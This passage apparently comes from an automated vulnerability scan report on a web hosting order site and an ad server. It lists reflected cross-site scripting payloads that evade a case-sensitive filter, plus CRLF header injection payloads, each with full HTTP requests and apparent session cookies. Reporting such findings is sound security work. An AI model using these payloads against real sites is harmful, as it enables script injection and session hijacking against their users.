GET /xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.domains HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/MsHosting is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/MsHosting. The payload 9d4af</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>542f10c1a1e was submitted in the REST URL parameter 3. This input was returned as 9d4af</ScRiPt ><ScRiPt>alert(1)</ScRiPt>542f10c1a1e in a subsequent request for the URL /xml/order/MsHosting.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/MsHosting9d4af</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>542f10c1a1e;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail HTTP/1.1 Host: order.1and1.com Proxy-Connection: keep-alive Referer: http://order.1and1.com/xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=; emos1und1d1_jcsid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k22HCyrc0S5Ck_gLCqZigiV2:1300632671085; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1300632671085:0:false:10
Request 2
GET /xml/order/MsHosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&__lf=Static&linkOrigin=Home&linkId=hd.nav.mail HTTP/1.1 Host: order.1and1.com Proxy-Connection: keep-alive Referer: http://order.1and1.com/xml/order/Home;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__reuse=1300632650912 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_TST_=7f633103f81ccc00; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; UT=7aF0tMDEnUFBQYXRqcTdvaTYoMmteWDBHOjQcIB0dHBozMS4uMTAqLTEkJiUkIUY0YFVXZR0fGmE6ZHM5LC0pKC0pJyooIiohIClhYigbO2t0Oi0uKikuKigrKSMrIiE=; emos1und1d1_jcsid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k22HCyrc0S5Ck_gLCqZigiV2:1300632671085; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1:AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:1300632671085:0:false:10
The value of REST URL parameter 3 submitted to the URL /xml/order/Service is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Service. The payload 2eb97</ScRiPt%20><x%20style%3dx%3aexpression(alert(1))>359b8a2e72d was submitted in the REST URL parameter 3. This input was returned as 2eb97</ScRiPt ><x style=x:expression(alert(1))>359b8a2e72d in a subsequent request for the URL /xml/order/Service.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/Service2eb97</ScRiPt%20><x%20style%3dx%3aexpression(alert(1))>359b8a2e72d;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/Service;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/Sharepoint is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/Sharepoint. The payload 2f20e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>1ed21c34ec was submitted in the REST URL parameter 3. This input was returned as 2f20e</ScRiPt ><ScRiPt>alert(1)</ScRiPt>1ed21c34ec in a subsequent request for the URL /xml/order/Sharepoint.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/Sharepoint2f20e</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>1ed21c34ec;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.sharepoint HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkOrigin=Hosting&linkId=hd.nav.sharepoint HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 3 submitted to the URL /xml/order/VirtualServerL is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/VirtualServerL. The payload dddff</ScRiPt%20><img%20src%3da%20onerror%3dalert(1)>d0fee8f5448 was submitted in the REST URL parameter 3. This input was returned as dddff</ScRiPt ><img src=a onerror=alert(1)>d0fee8f5448 in a subsequent request for the URL /xml/order/VirtualServerL.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
The value of REST URL parameter 3 submitted to the URL /xml/order/popupDomainPrices is copied into a JavaScript string which is encapsulated in double quotation marks at the URL /xml/order/popupDomainPrices. The payload 753b5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>63529f6639f was submitted in the REST URL parameter 3. This input was returned as 753b5</ScRiPt ><ScRiPt>alert(1)</ScRiPt>63529f6639f in a subsequent request for the URL /xml/order/popupDomainPrices.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".
Request 1
GET /xml/order/popupDomainPrices753b5</ScRiPt%20><ScRiPt>alert(1)</ScRiPt>63529f6639f;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
Request 2
GET /xml/order/popupDomainPrices;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Order-Tariff HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of REST URL parameter 1 is copied into the Location response header. The payload 301c5%0d%0a8c848ec608 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /301c5%0d%0a8c848ec608/N5315.150143.0288179548321/B5334493.21;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B2ZKC4TWGTZndLcvOlQe3_pi4DpLA6I0CiujKqBq-oOWYNpCf2gMQARgBINydnhA4AFCulJOBB2DJBqABpuKz6gOyAQ13d3cuYWxleGEuY29tugEKMTYweDYwMF9hc8gBCdoBJGh0dHA6Ly93d3cuYWxleGEuY29tL3NpdGVpbmZvL3hzcy5jeOABA7gCGMACBcgC8rWcG6gDAdEDX7TNu-ilXeT1AwAAAAQ&num=1&sig=AGiWqtzUVNt4cstzffq0L0DBK_CnmL_HbQ&client=ca-pub-1254652388917369&adurl=;ord=862444845? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1254652388917369&output=html&h=600&slotname=3135197487&w=160&lmt=1300659268&flash=10.2.154&url=http%3A%2F%2Fwww.alexa.com%2Fsiteinfo%2Fxss.cx&dt=1300641268294&bpp=6&shv=r20110315&jsv=r20110317&prev_fmts=336x280_as&prev_slotnames=7625873888&correlator=1300641268399&frm=0&adk=3059816711&ga_vid=259840090.1300641268&ga_sid=1300641268&ga_hid=1855413439&ga_fc=1&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1096&bih=916&fu=0&ifi=3&dtd=257&xpc=TZi5ezzzc8&p=http%3A//www.alexa.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
The value of REST URL parameter 1 is copied into the Location response header. The payload 9255d%0d%0a5f9b348da50 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /9255d%0d%0a5f9b348da50/N5621.66.2412875475321/B4682155;sz=728x90;;click=http://yads.zedo.com/ads2/c?a=914396%3Bn=1219%3Bx=24093%3Bc=1219000054,1219000049%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=1%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=jhmxpQoBADYAAET@BzgAAAAW~022111%3Bk%3D;ord=0.5315556428395212? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.alexa.com/siteinfo/xss.cx User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
The value of REST URL parameter 1 is copied into the Location response header. The payload 85d67%0d%0af8e979beb10 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /85d67%0d%0af8e979beb10/N5295.150800.VALUECLICK/B5319645.4;sz=160x600;click=http://media.fastclick.net/w/click.here?cid=288503&mid=539251&m=3&sid=47857&c=0&tp=7&forced_click=;ord=20110320171328? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.robtex.com/ext/ads/buchscr User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c708f553300004b|2818894/957634/15036,578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb; __gads=ID=46b610ae0802f836:T=1299599836:S=ALNI_MZzdV0LZs3Dmal4yFxQFOTvWOZQJg; L2676=1.1300710919721
The value of the $ request parameter is copied into the Set-Cookie response header. The payload 29621%0d%0ac2b3a7ca40d was submitted in the $ parameter. This caused a response containing an injected HTTP header.
The value of the jsessionid request parameter is copied into the Location response header. The payload ed455%0d%0a503217b4f8d was submitted in the jsessionid parameter. This caused a response containing an injected HTTP header.
Request
GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_toped455%0d%0a503217b4f8d&linkId=hd.log.eue&site=PU.WH.US&origin.page=Hosting&linkOrigin=Hosting&linkId=hd.log.eue HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of the linkId request parameter is copied into the Location response header. The payload c29e1%0d%0a97b1abda1ab was submitted in the linkId parameter. This caused a response containing an injected HTTP header.
Request
GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=c29e1%0d%0a97b1abda1ab&site=PU.WH.US&origin.page=Hosting&linkOrigin=Hosting&linkId=hd.log.eue HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of the linkOrigin request parameter is copied into the Location response header. The payload a5802%0d%0a86591ee57c3 was submitted in the linkOrigin parameter. This caused a response containing an injected HTTP header.
Request
GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=hd.log.eue&site=PU.WH.US&origin.page=Hosting&linkOrigin=a5802%0d%0a86591ee57c3&linkId=hd.log.eue HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
3.8. http://order.1and1.com/xml/order/Jumpto [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://order.1and1.com
Path:
/xml/order/Jumpto
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload b9161%0d%0a0390bad3044 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&linkId=hd.log.eue&site=PU.WH.US&origin.page=Hosting&linkOrigin=Hosting&linkId=hd.log.eue&b9161%0d%0a0390bad3044=1 HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The value of the origin.page request parameter is copied into the Location response header. The payload 2e03b%0d%0ad348ca74978 was submitted in the origin.page parameter. This caused a response containing an injected HTTP header.
Request
